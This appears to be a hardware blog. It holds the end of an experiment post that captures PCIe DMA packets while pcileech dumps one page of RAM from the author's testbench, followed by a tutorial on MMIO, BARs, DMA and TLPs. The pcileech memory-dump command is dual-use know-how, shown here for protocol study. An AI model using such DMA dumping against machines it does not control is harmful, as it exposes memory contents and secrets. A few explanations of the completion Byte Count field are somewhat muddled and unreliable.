    f0000000-f7ffffff : pnp 00:00
  fd210510-fd21053f : MSFT0101:00
  feb80000-febfffff : pnp 00:01
  fec00000-fec003ff : IOAPIC 0
  fec01000-fec013ff : IOAPIC 1
  fec10000-fec10fff : pnp 00:05
  fed00000-fed003ff : HPET 0
    fed00000-fed003ff : PNP0103:00
  fed81200-fed812ff : AMDI0030:00
  fed81500-fed818ff : AMDI0030:00
fedc0000-fedc0fff : pnp 00:05
fee00000-fee00fff : Local APIC
  fee00000-fee00fff : pnp 00:05
  ff000000-ffffffff : pnp 00:05
100000000-24e2fffff : System RAM
  250000000-26fffffff : pnp 00:02
3fffe0000000-3fffffffffff : 0000:2b:00.0

Reserved regions removed for brevity.

In this case, for this experiment, I am going to read 0x1000 bytes (one 4096 byte page) of memory from the 32-bit address 0x1000, which begins the first range of System RAM assigned to the physical address layout:

00001000-0009ffff : System RAM

Since this is actual RAM, our DMA will be successful. If this was not memory, our request would likely receive a Completion Error with Unsupported Request.
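Picking a safe target by eye works fine, but the same check is easy to script. Below is a small Python sketch that pulls the top-level System RAM ranges out of /proc/iomem style text and tests whether a transfer fits inside one of them. The function names are mine, and the `sample` text is a shortened excerpt of the output above rather than the full file. On a live system you would read /proc/iomem as root, since the addresses are hidden from unprivileged users.

```python
def top_level_ranges(iomem_text, label):
    """Return (start, end) for each non-indented entry with the given label."""
    ranges = []
    for line in iomem_text.splitlines():
        if not line or line[0].isspace():
            continue  # skip blank lines and nested (indented) entries
        span, _, name = line.partition(" : ")
        if name.strip() != label:
            continue
        start, _, end = span.partition("-")
        ranges.append((int(start, 16), int(end, 16)))
    return ranges

def fits(addr, length, ranges):
    """True if [addr, addr + length) lies entirely inside one range."""
    return any(s <= addr and addr + length - 1 <= e for s, e in ranges)

# Shortened excerpt of the /proc/iomem output shown above.
sample = """\
00001000-0009ffff : System RAM
  000a0000-000dffff : PCI Bus 0000:00
00100000-09afefff : System RAM
0a200000-0a20cfff : ACPI Non-volatile Storage
"""

ram = top_level_ranges(sample, "System RAM")
print([(hex(s), hex(e)) for s, e in ram])
print(fits(0x1000, 0x1000, ram))       # the read used in this experiment
print(fits(0xA0000, 0x1000, ram))      # not RAM
```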

The pcileech command to execute will be:

sudo pcileech -device rawudp://ip=10.0.0.64 dump -min 0x1000 -max 0x2000

Where:

The FPGA device is assigned the IP address 10.0.0.64 by my LAN
dump is the command to execute
-min 0x1000 specifies to start dumping memory from this address
-max 0x2000 specifies to stop dumping memory at this address. This results in 0x1000 bytes being read by the device.

Analyzer Output

From this output, you can see an interesting property of DMA: the sheer number of packets involved. The first packet here is a MemRd_32 packet headed upstream. If the address being targeted was a 64-bit address, it would use the MemRd_64 TLP. Let’s take a look at that first:

Here we can see a few interesting things:

The Requester field contains the device’s BDF. This is because the device initiated the request, not the Root Complex.
The Address is 0x1000. This means we are requesting to read from address 0x1000 as expected.
The Length is 0x000, which is the number of 4-byte DWORDs to transfer. This seems a bit weird, because we are reading 4096 bytes of data. This is actually because 0x000 is a special number that means Maximum Length. In the above bit layout, we see the Length field in the packet is 10 bits. The maximum 10-bit value that can be expressed in binary is 0x3FF. 0x3FF * 4 = 0xFFC, which is 4 bytes too small to express the number 4096. Since transferring 0 bytes of data doesn’t make sense, the number is used to indicate the maximum value, or 4096 in this case!
The Tag is 0x80. We will expect all Completions to also have the same Tag to match the response to the request.
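The Length encoding described above can be sketched in a few lines of Python. This is only an illustration of the "zero means maximum" rule for a 10-bit field counted in DWORDs; the function names are my own and not part of any tool used in this experiment.

```python
LENGTH_FIELD_BITS = 10  # width of the TLP Length field


def decode_length_dwords(raw: int) -> int:
    """Return the number of DWORDs encoded by a raw Length field value."""
    if not 0 <= raw < (1 << LENGTH_FIELD_BITS):
        raise ValueError("Length field is only 10 bits wide")
    # A raw value of 0 is the special case meaning the maximum: 1024 DWORDs.
    return raw if raw != 0 else 1 << LENGTH_FIELD_BITS


def decode_length_bytes(raw: int) -> int:
    """Convert the raw Length field into a byte count (4 bytes per DWORD)."""
    return decode_length_dwords(raw) * 4


print(hex(decode_length_bytes(0x3FF)))  # 0xffc
print(decode_length_bytes(0x000))       # 4096
print(decode_length_bytes(0x020))       # 128
```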

And finally, let’s look at the first Completion with Data (CplD) returned by the host:

We can see right off the bat that this looks a whole lot like a Completion with Data for the config space read in the previous section. But in this case, it’s much larger in size, containing a total of 128 bytes of payload returned from System RAM to our device.

Some more interesting things to point out here:

Length: Length is 0x20 DWORDs, or 0x20*4=128 bytes of payload. This means that the resulting 4096 byte transfer has been split up into many CplD TLPs each containing 128 bytes of the total payload.
Byte Count: This value shows the remaining number of DWORDs left to be sent back for the request. In this case, it is 0x000 again, which means that this is the first of 4096 bytes pending.
Tag: The Tag of 0x80 matches the value of our request.
Requester ID: This Completion found its way back to our device due to the 2A:00.0 address being marked in the requester.
Completer ID: An interesting change here compared to config space is that the Completer is not the 00:00.0 Root Complex device. Instead, it is the device 00:01.3. What device is that? If we look back up at the lspci output, this is a Root Port bridge device. It appears that this platform marks the Completer of the request as the Root Port the device is connected to, not the Root Complex itself.

And just for consistency, here is the second Completion with Data (CplD) returned by the host:

The major change here for the second chunk of 128 bytes of payload is that the Byte Count field has decremented by 0x20, which was the size of the previous completion. This means that this chunk of data will be read into the device at offset 0x20*4 = 0x80. This shouldn’t be too surprising: we will continue to decrement this Byte Count field until it eventually reaches 0x020, which will mark the final completion of the transfer. The DMA Engine on the device will recognize that the transfer is complete and mark the original 4096 byte request as complete internally.

gbps@testbench:~/pcileech$ sudo pcileech -device rawudp://ip=10.0.0.64 dump -min 0x1000 -max 0x2000

 Current Action: Dumping Memory
 Access Mode:    Normal
 Progress:       0 / 0 (100%)
 Speed:          4 kB/s
 Address:        0x0000000000001000
 Pages read:     1 / 1 (100%)
 Pages failed:   0 (0%)
Memory Dump: Successful.

Maximum Payload Size Configuration

Now only one question remains: why are there so many Completion TLPs for a single page read?

The answer lies in a specific configuration property of the device and the platform: the Maximum Payload Size.

If we look back at the configuration space of the device:

The Device Control register has been programmed with a MaxPayload of 128 bytes. This means that the device is not allowed to send or receive any TLP with a payload larger than 128 bytes. As a result, our 4096 byte request will always be fragmented into 4096/128 = 32 completions per page.

Notice above that there is a field DevCap: MaxPayload 256 bytes, which shows that the Device Capabilities register advertises that this device’s hardware is able to handle payloads of up to 256 bytes. If the link were configured for 256 byte payloads, the device could potentially cut the TLP header overhead in half, to only 16 completions per page.

It is not clear at this exact moment what at the platform or OS level has reduced the MaxPayload to 128 bytes. Typically it is the bridge device above the device in question that limits the MaxPayload size; however, in this case the max size supported by the Root Port this device is connected to is 512 bytes. With some further investigation, maybe I’ll be able to discover that answer.

And there you have it, a more in-depth look into how a device performs DMA!

Conclusion

This simple experiment hopefully gives you a nicer look into the “black box” of the PCIe link. While it’s nice to see diagrams, I think it’s much sweeter to look into actual packets on the wire to confirm that your understanding is what actually happens in practice.

We saw that config space requests are simple 4-byte data accesses that utilize the CfgRd and CfgWr TLP types. This is separate from DMA and MMIO, which use the MemRd and MemWr TLP types. We also saw how Completions can be fragmented in order to return parts of the overall transfer for larger DMA transfers, such as a 4096-byte page.

I hope to provide more complex or potentially more “interactive” experiments later. For now, I leave you with this as a more simplistic companion to the Part 2 of my series.

Hope you enjoyed!

- Gbps

Reversing Engineering for the Soul
PCIe Part 2 - All About Memory: MMIO, DMA, TLPs, and more!
26 March 2024 at 00:00

Recap from Part 1

In Part 1 of this post series, we discussed ECAM and how configuration space accesses looked in both software and on the hardware packet network. In that discussion, the concepts of TLPs (Transaction Layer Packets) were introduced, which is the universal packet structure by which all PCIe data is moved across the hierarchy. We also discussed how these packets move similar to Ethernet networks in that an address (the BDF in this case) was used by routing devices to send Configuration Space packets across the network.

Configuration space reads and writes are just one of the few ways that I/O can be performed directly with a device. Given its “configuration” name, it is clear that its intention is not for performing large amounts of data transfer. The major downfall is its speed, as a configuration space packet can only contain at most 64-bits of data being read or written in either direction (often only 32-bits). With that tiny amount of usable data, the overhead of the packet and other link headers is significant and therefore bandwidth is wasted.

As discussed in Part 1, understanding memory and addresses will continue to be the key to understanding PCIe. In this post, we will look more in-depth into the much faster forms of device I/O transactions and begin to form an understanding of how software device drivers actually interface with PCIe devices to do useful work. I hope you enjoy!

NOTE: You do not need to be an expert in computer architecture or TCP/IP networking to get something from this post. However, knowing the basics of TCP/IP and virtual memory is necessary to grasp some of the core concepts of this post. This post also builds off of information from Part 1. If you need to review these, do so now!

Introduction to Data Transfer Methods in PCIe

Configuration space was a simple and effective way of communicating with a device by its BDF during enumeration time. It is a simple mode of transfer for a reason - it must be the basis by which all other data transfer methods are configured and made usable. Once the device is enumerated, configuration space has set up all of the information the device needs to perform actual work together with the host machine. Configuration space is still used to allow the host machine to monitor and respond to changes in the state of the device and its link, but it will not be used to perform actual high speed transfer or functionality of the device.

What we now need are data transfer methods that let us really begin to take advantage of the high-speed transfer throughput that PCIe was designed for. Throughput is a measurement of the number of bytes transferred over a given period of time. This means that to maximize throughput, we must minimize the overhead of each packet to transfer the maximum number of bytes per packet. If we only send a few DWORDs (4 bytes each) per packet, like in the case of configuration space, the exceptional high-speed transfer capabilities of the PCIe link are lost.
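To get a feel for why payload size matters so much, here is a rough back-of-the-envelope sketch. The per-packet overhead of 24 bytes is purely an assumed figure for illustration (the real cost depends on the header format and link generation), and the function name is my own.

```python
ASSUMED_OVERHEAD_BYTES = 24  # hypothetical per-packet cost, for illustration only


def link_efficiency(payload_bytes: int,
                    overhead_bytes: int = ASSUMED_OVERHEAD_BYTES) -> float:
    """Fraction of the bytes on the wire that are actual payload data."""
    return payload_bytes / (payload_bytes + overhead_bytes)


# Compare a single DWORD (config-space style) with larger memory payloads.
for payload in (4, 128, 256):
    print(f"{payload:>4} byte payload: {link_efficiency(payload):.0%} of bytes are data")
```

Under that assumption, a 4-byte payload spends most of the link's bandwidth on overhead, while a 128 or 256 byte payload spends the large majority of it on data.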

Without further ado, let’s introduce the two major forms of high-speed I/O in PCIe:

Memory Mapped Input/Output (abbrev. MMIO) - In the same way the host CPU reads and writes memory to ECAM to perform config space access, MMIO can be used to map an address space of a device to perform memory transfers. The host machine configures “memory windows” in its physical address space that give the CPU a window of memory addresses which magically translate into reads and writes directly to the device. The memory window is decoded inside the Root Complex to transform the reads and writes from the CPU into data TLPs that go to and from the device. Hardware optimizations allow this method to achieve a throughput that is quite a bit faster than config space accesses. However, its speed still pales in comparison to the bulk transfer speed of DMA.
Direct Memory Access (abbrev. DMA) - DMA is by far the most common form of data transfer due to its raw transfer speed and low latency. Whenever a driver needs to do a transfer of any significant size between the host and the device in either direction, it will assuredly be DMA. But unlike MMIO, DMA is initiated by the device itself, not the host CPU. The host CPU will tell the device over MMIO where the DMA should go and the device itself is responsible for starting and finishing the DMA transfer. This allows devices to perform DMA transactions without the CPU’s involvement, which saves a huge number of CPU cycles compared to the device having to wait for the host CPU to tell it what to do for each transfer. Due to its ubiquity and importance, it is incredibly valuable to understand DMA from both the hardware implementation and the software interface.

High level overview of MMIO method

High level overview of performing DMA from device to RAM. The device interrupts the CPU when the transfer to RAM is complete.

Introduction to MMIO

What is a BAR?

Because configuration space memory is limited to 4096 bytes, there’s not much useful space left afterwards to use for device-specific functionality. What if a device wanted to map a whole gigabyte of MMIO space for accessing its internal RAM? There’s no way to fit that into 4096 bytes of configuration space. So instead, it will need to request what is known as a BAR (Base Address Register). This is a register exposed through configuration space that allows the host machine to configure a region of its memory to map directly to the device. Software on the host machine then accesses BARs through memory read/write instructions directed to the BAR’s physical addresses, just as we’ve seen with the MMIO in ECAM in Part 1. Just as with ECAM, the act of reading or writing to this mapping of device memory will translate directly into a packet sent over the hierarchy to the device. When the device needs to respond, it will send a new packet back up through the hierarchy to the host machine.

Device drivers running on the host machine access BAR mappings, which translate into packets sent through PCIe to the device.

When a CPU instruction reads the memory of a device’s MMIO region, a Memory Read Request Transaction Layer Packet (MemRd TLP) is generated that is transferred from the Root Complex of the host machine down to the device. This type of TLP informs the receiver that the sender wishes to read a certain number of bytes from the receiver. The expectation of this packet is that the device will respond with the contents at the requested address as soon as possible.

All data transfer packets sent and received in PCIe will be in the form of these Transaction Layer Packets. Recall from Part 1 that these packets are the central abstraction by which all communication between devices takes place in PCIe. These packets are reliable in the case of data transfer errors (similar to TCP in networking) and can be retried/resent if necessary. This ensures that data transfers are protected from the harsh nature of electrical interference that takes place in the extremely high speeds that PCIe can achieve. We will look closer at the structure of a TLP soon, but for now just think of these as regular network packets you would see in TCP.

When the device responds, the CPU updates the contents of the register with the result from the device.

When the device receives the requestor packet, the device responds to the memory request with a Memory Read Response TLP. This TLP contains the result of the read from the device’s memory space given the address and size in the original requestor packet. The device marks the specific request packet and sender it is responding to into the response packet, and the switching hierarchy knows how to get the response packet back to the requestor. The requestor will then use the data inside the response packet to update the CPU’s register of the instruction that produced the original request.

In the meantime while a TLP is in transit, the CPU must wait until the memory request is complete and it cannot be interrupted or perform much useful work. As you might see, if lots of these requests need to be performed, the CPU will need to spend a lot of time just waiting for the device to respond to each request. While there are optimizations at the hardware level that make this process more streamlined, it still is not optimal to use CPU cycles to wait on data transfer to be complete. Hopefully you see that we need a second type of transfer, DMA, to address these shortcomings of BAR access.

Another important point here is that device memory does not strictly need to be the device’s RAM. While it is common to see devices with onboard RAM having a mapping of their internal RAM exposed through a BAR, this is not a requirement. For example, it’s possible that accessing the device’s BAR might access internal registers of the device or cause the device to take certain actions. Writing to a BAR, for instance, is the primary way by which devices are told to begin performing DMA. A core takeaway should be that device BARs are very flexible and can be used both for controlling the device and for performing data transfer to or from the device.

How BARs are Enumerated

Devices request memory regions from software using their configuration space. It is up to the host machine at enumeration time to determine where in physical memory each region is going to be placed. Each device has six 32-bit values in its configuration space (known as “registers”, hence the name Base Address Register) that the software will read and write to when the device is enumerated. These registers describe the length and alignment requirements of each of the MMIO regions the device wishes to allocate, one per possible BAR up to a total of six different regions. If the device wants the ability to map its BAR to above the 4GB space (a 64-bit BAR), it can combine two of the 32-bit registers together to form one 64-bit BAR, leaving a maximum of only three 64-bit BARs. This retains the layout of config space for legacy purposes.

A Type 0 configuration space structure, showing the 6 BARs.

TERMINOLOGY NOTE: Despite the acronym BAR meaning Base Address Register, you will see the above text refers to the memory window of MMIO as a BAR as well. This unfortunately means that the name of the register in configuration space is also the same name as the MMIO region given to the device (both are called BARs). You might need to read into the context of what is being talked about to determine if they mean the window of memory, or the actual register in config space itself.

BARs are another example of a register in config space that is not constant. In Part 1, we looked at some constant registers such as VendorID and DeviceID. But BARs are not constant registers, they are meant to be written and read by the software. In fact, the values written to the registers by the software are special in that writing certain kinds of values to the register will result in different functionality when read back. If you haven’t burned into your brain the fact that device memory is not always RAM and one can read values back different than what was written, now’s the time to do that.

Device memory can be RAM, but it is not always RAM and does not need to act like RAM!
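To make the "read back something different than what was written" idea concrete, here is a toy model of the conventional sizing handshake for a 32-bit memory BAR: software writes all 1s, and the device only latches the address bits above its region size. The class and function names are hypothetical, and this is a simplified sketch rather than a full model of the register.

```python
class Bar32:
    """Toy model of a 32-bit memory BAR that decodes a power-of-two region."""

    FLAG_MASK = 0xF  # low 4 bits: read-only type flags for a memory BAR

    def __init__(self, size: int, flags: int = 0x0):
        if size < 16 or size & (size - 1):
            raise ValueError("size must be a power of two of at least 16 bytes")
        self.size = size
        self.flags = flags & self.FLAG_MASK
        self.base = 0

    def write(self, value: int) -> None:
        # Address bits below the region size are hardwired to zero.
        self.base = value & 0xFFFFFFFF & ~(self.size - 1)

    def read(self) -> int:
        return self.base | self.flags


def probe_size(bar: Bar32) -> int:
    """Size the BAR: write all 1s, read back, then restore the old value."""
    original = bar.read()
    bar.write(0xFFFFFFFF)
    readback = bar.read()
    bar.write(original)
    # Clear the flag bits, then invert and add one to recover the size.
    return (~(readback & ~Bar32.FLAG_MASK) + 1) & 0xFFFFFFFF


bar = Bar32(size=0x10000)
print(hex(probe_size(bar)))  # 0x10000
bar.write(0xFE123456)
print(hex(bar.read()))       # 0xfe120000
```

The second print shows the key point: the value read back (0xfe120000) is not the value that was written (0xFE123456), because the register is not acting like RAM.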

What is DMA? Introduction and Theory

We have seen two forms of I/O so far, the config space access and the MMIO access through a BAR. The final form of access we will talk about is Direct Memory Access (DMA). DMA is by far the fastest method of bulk transfer for PCIe because it has the least transfer overhead. That is, the least amount of resources are required to transfer the maximum number of bytes across the link. This makes DMA absolutely vital for truly taking advantage of the high speed link that PCIe provides.

But, with great power comes great confusion. To software developers, DMA is a very foreign concept because we don’t have anything like it to compare to in software. For MMIO, we can conceptualize the memory accesses as instructions reading and writing from device memory. But DMA is very different from this. This is because DMA is asynchronous: it does not utilize the CPU in order to perform the transfer. Instead, as the name implies, the memory read and written comes and goes directly from system RAM. The only parties involved once DMA begins are the memory controller of the system’s main memory and the device itself. Therefore, the CPU does not spend cycles waiting for individual memory access. It instead just initiates the transfer and lets the platform complete the DMA on its own in the background. The platform will then inform the CPU when the transfer is complete, typically through an interrupt.

Let’s think for a second about why it is so important that DMA is performed asynchronously. Consider the case where the CPU is decrypting a huge number of files from an NVMe SSD on the machine. Once the NVMe driver on the host initiates DMA, the device is constantly streaming file data as fast as possible from the SSD’s internal storage to locations in system RAM that the CPU can access. Then, the CPU can use 100% of its processing power to perform the decryption math operations necessary to decrypt the blocks of the files as it reads data from system memory. The CPU spends no time waiting for individual memory reads to the device, it instead just hooks up the firehose of data and allows the device to transfer as fast as it possibly can, and the CPU processes it as fast as it can. Any extra data is buffered in the meantime within the system RAM until the CPU can get to it. In this way, no part of any process is waiting on something else to take place. All of it is happening simultaneously and at the fastest speed possible.

Because of its complexity and number of parts involved, I will attempt to explain DMA in the most straightforward way that I can with lots of diagrams showing the process. To make things even more confusing, every device has a different DMA interface. There is no universal software interface for performing DMA, and only the designers of the device know how that device can be told to perform DMA. Some device classes thankfully use a universally agreed upon interface such as the NVMe interface used by most SSDs or the XHCI interface for USB 3.0. Without a standard interface, only the hardware designer knows how the device performs DMA, and therefore the company or person producing the device will need to be the one writing the device driver rather than relying on the universal driver bundled with the OS to communicate with the device.

A “Simple” DMA Transaction - Step By Step

The first step of our DMA journey will be looking at the initial setup of the transfer. This involves a few steps that prepare the system memory, kernel, and device for the upcoming DMA transfer. In this case, we will be setting up DMA in order to read in the contents of memory in our DMA Buffer which is present in system RAM and place it into the device’s on-board RAM at Target Memory. We have already chosen at this point to read this memory from the DMA Buffer into address 0x8000 on the device. The goal is to transfer this memory as quickly as possible from system memory to the device so it can begin processing it. Assume in this case that the amount of memory is many megabytes and MMIO would be too slow, but we will only show 32 bytes of memory for simplicity. This transfer will be the simplest kind of DMA transfer: Copy a known size and address of a block of memory from system RAM into device RAM.

Step 1 - Allocating DMA Memory from the OS

The first step of this process is Allocate DMA Memory from OS. This means that the device driver must make an OS API call to ask the OS to allocate a region of memory for the device to read data from or write data to. This is important because the OS might need to perform special memory management operations to make the data available to the device, such as removing protections or reorganizing existing allocations to facilitate the request.

DMA memory classically must be contiguous physical memory, which means that the device starts at some base address and reads or writes data linearly from the start to the end of the buffer. Therefore, the OS must be responsible for organizing its physical memory to create contiguous ranges that are large enough for the DMA buffers being requested by the driver. Sometimes, this can be very difficult for the memory manager to do for a system that has been running for a very long time or has limited physical memory. Therefore, enhancements in this space have allowed more modern devices to transfer to non-contiguous regions of memory using features such as Scatter-Gather and IOMMU Remapping. Later on, we will look at some of those features. But for now, we will focus only on the simpler contiguous memory case.

Once the requested allocation succeeds, the memory address is returned by the API and points to the buffer in system RAM. This will be the address through which the device accesses the buffer over DMA. Addresses returned by an API intended for DMA are given a special name: device logical address, or just logical address. For our example, a logical address is identical to a physical address. The device sees the exact same view of physical memory that our OS sees, and there are no additional translations done. However, this might not always be the case in more advanced forms of transfer. Therefore it’s best to be aware that a device address given to you might not always be the same as its actual physical address in RAM.

Once the buffer is allocated, since the intention is to move data from this buffer to the device, the device driver will populate the buffer in advance with the information it needs to write to the device. In this example, data made of a repeating 01 02 03 04 pattern is being transferred to the device’s RAM.

Step 2 - Programming DMA addresses to the device and beginning transfer

The next step of the transfer is to prepare the device with the information it needs to perform the transaction. This is usually where the knowledge of the device’s specific DMA interface is most important. Each device is programmed in its own way, and the only way to know how the driver should program the device is to either refer to its general standard such as the NVMe Specification or to simply work with the hardware designer.

In this example, I am going to make up a simplified DMA interface for a device with only the most barebones features necessary to perform a transfer. In the figures below, we can see that this device is programmed through values the driver writes into a BAR0 MMIO region. That means that to program DMA for this device, the driver must write memory into the MMIO region specified by BAR0. The location of each register inside this BAR0 region is known in advance by the driver writer and is integrated into the device driver’s code.

I have created four device registers in BAR0 for this example:

Destination Address - The address in the device’s internal RAM to write the data it reads from system RAM. This is where we will program our already-decided destination address of 0x8000.
Source Address - The logical address of system RAM that the device will read data from. This will be programmed with the logical address of our DMA Buffer which we want the device to read.
Transfer Size - The size in bytes that we want to transfer.
Initiate Transfer - As soon as a 1 is written to this register, the device will begin DMAing between the addresses given above. This is a way that the driver can tell the device that it is done populating the buffer and is ready to start the transfer. This is commonly known as a doorbell register.

In the above diagram, the driver will need to write the necessary values into the registers using the mapped memory of BAR0 for the device (how it mapped this memory is dependent on the OS). The values in this diagram are as follows:

Target Memory - The memory we want to copy into on the device will be at 0x00008000, which maps to a region of memory in the device’s on-board RAM. This will be our destination address.
DMA Buffer - The OS allocated the chunk of memory at 0x001FF000, so this will be our source address.

With this information, the driver can now program the values into the device as shown here:

Now, at this point the driver has configured all the registers necessary to perform the transfer. The last step is to write a value to the Initiate Transfer register which acts as the doorbell register that begins the transfer. As soon as this value is written, the device will drive the DMA transfer and execute it independently of the driver or the CPU’s involvement. The driver has now completed its job of starting the transfer and now the CPU is free to do other work while it waits on the device to notify the system of the DMA completion.
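The programming sequence above can be mocked up in software. The sketch below models the made-up device from this example; the register offsets and class name are hypothetical, and the toy device performs the copy immediately on the doorbell write, whereas a real device would carry it out asynchronously with TLPs.

```python
REG_DST_ADDR = 0x00   # hypothetical register offsets inside BAR0
REG_SRC_ADDR = 0x08
REG_XFER_SIZE = 0x10
REG_DOORBELL = 0x18


class ToyDmaDevice:
    """Software stand-in for the example device and its DMA engine."""

    def __init__(self, system_ram: bytearray, device_ram_size: int = 0x10000):
        self.system_ram = system_ram
        self.device_ram = bytearray(device_ram_size)
        self.regs = {REG_DST_ADDR: 0, REG_SRC_ADDR: 0, REG_XFER_SIZE: 0}

    def mmio_write(self, offset: int, value: int) -> None:
        """Model a driver store into the BAR0 window."""
        if offset == REG_DOORBELL:
            if value == 1:
                self._run_dma()
        else:
            self.regs[offset] = value

    def _run_dma(self) -> None:
        # Copy from system RAM (source) into device RAM (destination).
        src = self.regs[REG_SRC_ADDR]
        dst = self.regs[REG_DST_ADDR]
        size = self.regs[REG_XFER_SIZE]
        self.device_ram[dst:dst + size] = self.system_ram[src:src + size]


# Driver side: fill the DMA buffer, program the registers, ring the doorbell.
system_ram = bytearray(0x200000)
DMA_BUFFER = 0x001FF000
system_ram[DMA_BUFFER:DMA_BUFFER + 32] = bytes([1, 2, 3, 4]) * 8

dev = ToyDmaDevice(system_ram)
dev.mmio_write(REG_DST_ADDR, 0x8000)
dev.mmio_write(REG_SRC_ADDR, DMA_BUFFER)
dev.mmio_write(REG_XFER_SIZE, 32)
dev.mmio_write(REG_DOORBELL, 1)

print(dev.device_ram[0x8000:0x8008].hex())  # 0102030401020304
```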

Step 3 - Device performs DMA transaction

Now that the doorbell register has been written to by the driver, the device takes over to handle the actual transfer. On the device itself, there exists a module called the DMA Engine responsible for handling and maintaining all aspects of the transaction. When the device was programmed, the register writes to BAR0 were programming the DMA engine with the information it needs to begin sending off the necessary TLPs on the PCIe link to perform memory transactions.

As discussed in a previous section, all memory operations on the PCIe link are done through Memory Write/Read TLPs. Here we will dive into what TLPs are sent and received by the DMA engine of the device while the transaction is taking place. Remember that it is easier to think of TLPs as network packets that are sending and receiving data on a single, reliable connection.

Interlude: Quick look into TLPs

Before we look at the TLPs on the link, let’s take a closer look at a high level overview of packet structure itself.

Here are two TLPs shown for a memory read request and response. As discussed, TLPs for memory operations utilize a request and response system. The device performing the read will generate a Read Request TLP for a specific address and length (in 4-byte DWORDs), then sit back and wait for the completion packets to arrive on the link containing the response data.

We can see there is metadata related to the device producing the request, the Requester, as well as a unique Tag value. This Tag value is used to match a request with its completion. When the device produces the request, it tags the TLP with a unique value to track a pending request. The value is chosen by the sender of the request, and it is up to the sender to keep track of the Tags it assigns.

As completions arrive on the link, the Tag value of the completion allows the device to properly move the incoming data to the desired location for that specific transfer. This system allows there to be multiple unique outstanding transfers from a single device that are receiving packets interleaved with each other but still remain organized as independent transfers.
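Here is a minimal sketch of how a requester might use Tags to keep interleaved transfers apart. The class name, the pool of 256 tags, and the assumption that completions for a given Tag arrive in order are all mine, chosen only to illustrate the bookkeeping.

```python
class TagTracker:
    """Tracks outstanding read requests by Tag, as a requester might."""

    def __init__(self, num_tags: int = 256):  # pool size is an assumption
        self.free_tags = list(range(num_tags))
        self.pending = {}  # tag -> [destination buffer, bytes received so far]

    def issue_read(self, length: int) -> int:
        """Reserve a Tag for a new read of `length` bytes."""
        tag = self.free_tags.pop(0)
        self.pending[tag] = [bytearray(length), 0]
        return tag

    def on_completion(self, tag: int, payload: bytes):
        """Store the payload; return the finished buffer once it is full."""
        buf, received = self.pending[tag]
        buf[received:received + len(payload)] = payload
        received += len(payload)
        if received < len(buf):
            self.pending[tag][1] = received
            return None
        # Transfer finished: release the Tag so it can be reused.
        del self.pending[tag]
        self.free_tags.append(tag)
        return bytes(buf)


tracker = TagTracker()
a = tracker.issue_read(8)
b = tracker.issue_read(4)
print(tracker.on_completion(a, b"AAAA"))  # None
print(tracker.on_completion(b, b"BBBB"))  # b'BBBB'
print(tracker.on_completion(a, b"aaaa"))  # b'AAAAaaaa'
```

Even though the completion for the second read arrives in the middle of the first, each payload lands in the right buffer because the Tag identifies which request it belongs to.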

Also inside the packet is the information necessary to enable the PCIe switching hierarchy to determine where the request and completions need to go. For example, the Memory Address is used to determine which device is being requested for access. Each device in the hierarchy has been programmed during enumeration time to have unique ranges of addresses that each device owns. The switching hierarchy looks at the memory address in the packet to determine where that packet needs to go in order to access that address.

Once the device receives and processes the request, the response data is sent back in the form of a Completion TLP. The completion, or “response” packet, can and often will be fragmented into many smaller TLPs that each send a part of the overall response. This is because there is a Maximum Payload Size (MPS) that was determined could be handled by the device and bus during enumeration time. The MPS is configurable based on platform and device capability and is a power of 2 size starting from 128 and going up to a potential 4096. Typically this value is around 256 bytes, meaning the response to a large read request will need to be split into many smaller TLPs. Each of these packets has a field that dictates what offset of the original request the completion is responding to, and in the payload is the chunk of data being returned.
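As a rough illustration of that fragmentation, the sketch below splits a response into payload-sized pieces, pairing each piece with its offset into the original request. It assumes every completion carries a full payload except possibly the last; the function name is hypothetical.

```python
def split_into_completions(data: bytes, max_payload: int):
    """Yield (offset, chunk) pairs, each chunk at most max_payload bytes."""
    for offset in range(0, len(data), max_payload):
        yield offset, data[offset:offset + max_payload]


page = bytes(range(256)) * 16  # 4096 bytes of sample data
chunks = list(split_into_completions(page, 128))

print(len(chunks))                       # 32
print(chunks[1][0], len(chunks[1][1]))   # 128 128

# The requester can rebuild the original data by placing chunks at their offsets.
rebuilt = bytearray(len(page))
for offset, chunk in chunks:
    rebuilt[offset:offset + len(chunk)] = chunk
print(bytes(rebuilt) == page)            # True
```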

There is a common misconception that memory TLPs use BDF to address where packets need to go. The request uses only a memory address to direct a packet to its destination, and it’s the responsibility of the bridges in-between the device and destination to get that packet to its proper location. However, the completion packets do use the BDF of the Requester to return the data back to the device that requested it.
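The two routing rules can be put side by side in a small sketch. The address windows and BDFs here are invented for illustration, and the whole hierarchy is collapsed into a single lookup, so treat this as a mental model rather than how a real switch is built.

```python
from dataclasses import dataclass

# Hypothetical MMIO windows assigned to two devices during enumeration.
ADDRESS_WINDOWS = {
    "01:00.0": range(0xF000_0000, 0xF010_0000),
    "02:00.0": range(0xF010_0000, 0xF020_0000),
}


@dataclass
class MemRead:
    requester: str  # BDF of the sender
    tag: int
    address: int


@dataclass
class Completion:
    requester: str  # copied from the request; used to route the reply
    tag: int
    completer: str


def route_request(req: MemRead) -> str:
    """Requests are routed by address; anything unclaimed heads upstream."""
    for bdf, window in ADDRESS_WINDOWS.items():
        if req.address in window:
            return bdf
    return "root complex"


def make_completion(req: MemRead, completer: str) -> Completion:
    return Completion(requester=req.requester, tag=req.tag, completer=completer)


def route_completion(cpl: Completion) -> str:
    """Completions are routed by the Requester's BDF, not by address."""
    return cpl.requester


dma_read = MemRead(requester="01:00.0", tag=0x80, address=0x001F_F000)
target = route_request(dma_read)
print(target)                                                # root complex
print(route_completion(make_completion(dma_read, target)))   # 01:00.0

mmio_read = MemRead(requester="00:00.0", tag=0x01, address=0xF010_0040)
print(route_request(mmio_read))                              # 02:00.0
```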

Below is a diagram of a memory read and response showcasing that requests use an address to make requests and completions use the BDF in the Requester field of the request to send a response:

Now back to the actual transaction…

Let’s look at what all is sent and received by the DMA Engine in order to perform our request. Since we requested 32 bytes of data, there will only be one singular Memory Read Request and a singular Memory Read Completion packet with the response. For a small exercise for your understanding, stop reading forward and think for a moment which device is going to send and receive which TLP in this transaction. Scroll up above if you need to look at the diagrams of Step 2 again.

Now, let’s dig into the actual packets of the transfer. While I will continue to diagram this mock example out, I thought that for this exercise it might be fun and interesting to the reader to actually see what some of these TLPs look like when a real transaction is performed.

In the experiment, I set up the same general parameters as seen above with a real device and initiate DMA. The device will send real TLPs to read memory from system RAM and into the device. Therefore, you will be able to see a rare look into an example of the actual TLPs sent when performing this kind of DMA which are otherwise impossible to see in transit without one of these analyzers.

To view this experiment, follow this link to the companion post: Experiment - Packet Dumping PCIe DMA TLPs with a Protocol Analyzer and Pcileech

